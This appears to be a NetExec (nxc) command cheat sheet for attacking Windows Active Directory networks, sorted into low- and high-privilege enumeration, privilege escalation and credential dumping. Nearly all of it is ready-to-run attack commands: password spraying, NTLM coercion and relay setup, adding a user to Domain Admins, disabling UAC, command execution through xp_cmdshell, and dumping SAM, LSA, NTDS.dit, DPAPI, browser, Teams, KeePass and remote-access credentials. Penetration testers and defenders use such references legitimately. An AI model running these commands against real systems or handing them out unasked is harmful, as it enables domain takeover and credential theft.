Latest Windows and Linux versions can be downloaded from here.
New techniques can be found on this Twitter profile.
Official wiki.
Info
Most of these modules require local administrator privileges.
Low privilege
Enumeration
List users:
nxc ldap $IP -u username -p 'password' --usersRID brute force:
nxc mssql $IP -u username -p 'password' --rid-bruteCreate wordlist for password spray or ASREP-roast:
nxc smb $IP -d domain.local -u username -p 'password --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > usersLDAP queries:
nxc ldap $IP -u username -p 'password' --query "(sAMAccountName=username)" ""User description:
nxc ldap $IP -u username -p 'password' -M get-desc-usersCheck groups:
nxc ldap $IP -u username -p 'password' --groupsMultiple users enumeartion:
nxc ldap $IP -u username -p 'password' --users user1 user2BloodHound ingestor:
nxc smb $IP -u username -p 'password' --bloodhound -c AllPassword policy check:
nxc ldap $IP -u username -p 'password' -M psonxc ldap $IP -u username -p 'password' --pass-polRDP screenshot, when NLA is disabled:
nxc ldap $IP --nla-screenshotPassword change:
nxc smb $IP -u username -p 'password' -M change-password -o USER=target NEWPASS=passwordUser information:
nxc wmi $IP -u username -p 'password' --wmi "SELECT * FROM Win32_UserAccount"Task manager:
nxc smb $IP -u username -p 'password' --tasklistWindows Defender settings:
nxc smb $IP -u username -p 'password' -M wccSubnet enumeration:
nxc smb $IP -u username -p 'password' --interfacesDirectory listing:
nxc smb $IP -u username -p 'password' --share SHARE --dir "directory"Read files:
nxc smb $IP -u username -p 'password' -M notepad++WebDAV service status check:
nxc smb $IP -u username -p 'password' -M webdavAD CS enumeration:
nxc smb $IP -u username -p 'password' -M certipy_findPrivilege escalation
SMB relay:
nxc smb scope.txt --gen-relay-list targets.txtCreating shortcut files on SMB shares, for Responder:
nxc smb $IP -u username -p 'password' -M slinkyPassword spray, it can also be used for RDP and WinRM protocols:
nxc smb $IP -u username -p passwords.txt --continue-on-successChannel binding:
nxc ldap $IP -u username -p 'password' -M ldap-checkerCertificate authentication:
nxc ldap $IP -d domain.local -u username --pfx-cert user.pfxCoercion for ESC8:
nxc smb $IP -u username -p 'password' -M coerce_plus -o M=petitpotam L=$IPMachineAccountQuota check:
nxc smb $IP -u username -p 'password' -M maqComputer domain join:
nxc smb $IP -u username -p 'password' add-computerNTLM reflection:
nxc ldap $IP -u username -p 'password' -M ntlm_reflectionPre-Windows 2000:
nxc ldap $IP -u username -p 'password' -M pre2kCoercion with all techniques combined (PetitPotam, DFSCoerce, MSEven, ShadowCoerce and PrinterBug):
nxc smb $IP -u username -p 'password' -M coerce_plus -o LISTENER=$IPSMB Ghost vulnerability check:
nxc smb $IP -M smbghostEnumerating old Windows servers:
nxc smb $IP -u username -p 'password' -M obsoleteTimeroasting obtains NT hash form any computer account:
nxc smb $IP -M timeroastCredential dump
Group Policy password check:
nxc smb $IP -u username -p 'password' -M gpp_passwordFile share enumeration:
nxc smb $IP -u username -p 'password' -M spider_plus -o DOWNLOAD_FLAG=True High privilege
Enumeration
PowerShell command execution:
nxc smb $IP -u username -p 'password' -X ipconfig --force-ps32SCCM enumeration:
nxc smb $IP -u username -p 'password' --sccmnxc smb $IP -u username -p 'password' -M sccm -o REC_RESOLVE=TRUEnxc smb $IP -u username -p 'password' -M sccm-recon6 --dns-server $IPLAPS enumeration:
nxc smb $IP -u username -p 'password' --lapsFile transfer over SSH:
nxc ssh $IP -u username -p 'password' --put-file test.txt /tmp/test.txtPrivilege escalation
Add user to Domain Admins group in the context of logged on Domain Admin users. Sessions can be checked with --loggedon-users or --reg-sessions parameter.
nxc smb $IP -u username -p password -M schtask_as -o USER=DA CMD="powershell.exe net group \"Domain Admins\" user /add /domain"Impersonate logged on users by abusing AD CS. NT hash is obtained over PKINIT:
nxc smb $IP -u username -p 'password' -M masky -o CA= ADCS.domain.local\ADCS-CAToken impersonation, automatically escalates privileges:
nxc smb $IP -u username -p 'password' -M impersonateEnumerate delegations:
nxc ldap $IP -u username -p 'password' --find-delegationnxc smb $IP -u username -p 'password' --delegate administratorDisable UAC:
nxc smb $IP -u username -p 'password' -M remote-uac -o ACTION=disableCheck RDP sessions:
nxc smb $IP -u username -p 'password' --qwinstaEnable RDP:
nxc smb $IP -u username -p 'password' -M rdpShadow RDP:
nxc smb $IP -u username -p 'password' -M shadowrdp -o ACTION=disableMSSQL enumeration and exploitation:
nxc mssql $IP -u username -p 'password' -M mssql_privMSSQL coercion:
nxc mssql $IP -u username -p 'password' -M mssql_coerce -o L=$IPExecuting SQL queries:
nxc mssql $IP -u username -p 'password' -q 'SELECT name FROM master.dbo.sysdatabases;'Execute commands with xp_cmdshell:
nxc mssql $IP -u username -p 'password' -x commandFile download:
nxc mssql $IP -u username -p 'password' --get-file output targetNFS escape to root:
nxc nfs $IP --get-file '/etc/passwd' etc_passwdnxc nfs $IP --lsCredential dump
SAM dump, updated version doesn’t touch the disk.
nxc smb $IP -u username -p 'password' --sam --lsa --dpapi --ntdsDPAPI hash dump:
nxc smb $IP -u username -p 'password' --local-auth -M dpapi_hash -o "OUTPUTFILE=hashes.txt"Check autologon credentials in registry:
nxc smb $IP -u username -p 'password' -M reg-winlogonBackup operator privileges, useful for NTDS dump:
nxc smb $IP -u username -p 'password' -M backup_operatorNTDS.dit dump:
nxc smb $IP -u username -p 'password' -M ntdsutilnxc smb $IP -u username -p 'password' -M ntds-dump-rawVeeam SQL database dump:
nxc smb $IP -u username -p 'password' -M veeamFirefoxa credentials dump:
nxc smb $IP -u username -p 'password' -M firefoxDump credentials from remote access applications:
nxc smb $IP -u username -p 'password' -M puttynxc smb $IP -u username -p 'password' -M winscpnxc smb $IP -u username -p 'password' -M vncnxc smb $IP -u username -p 'password' -M mremotengnxc smb $IP -u username -p 'password' -M mobaxtermPowerShell history enumeration:
nxc smb $IP -u username -p 'password' -M powershell_historyKeePass process and database enumeration:
nxc smb $IP -u username -p 'password' -M keypass_discoverMicrosoft Teams cookie dump:
nxc smb $IP -u username -p 'password' -M teams_localdbCheck credentials in EventViewer logs:
nxc smb $IP -u username -p 'password' -M eventlog_credsRecent files enumeration:
nxc smb $IP -u username -p 'password' -M recent_filesClipboard dump:
nxc smb $IP -u username -p 'password' -M snippedFind passwords in IIS Application Pool config:
nxc smb $IP -u username -p 'password' -M iisExctract password for gMSA account over LDAPS:
nxc smb $IP -u username -p 'password' --gmsanxc smb $IP -u username -p 'password' --gmsa-decrypt-lsa user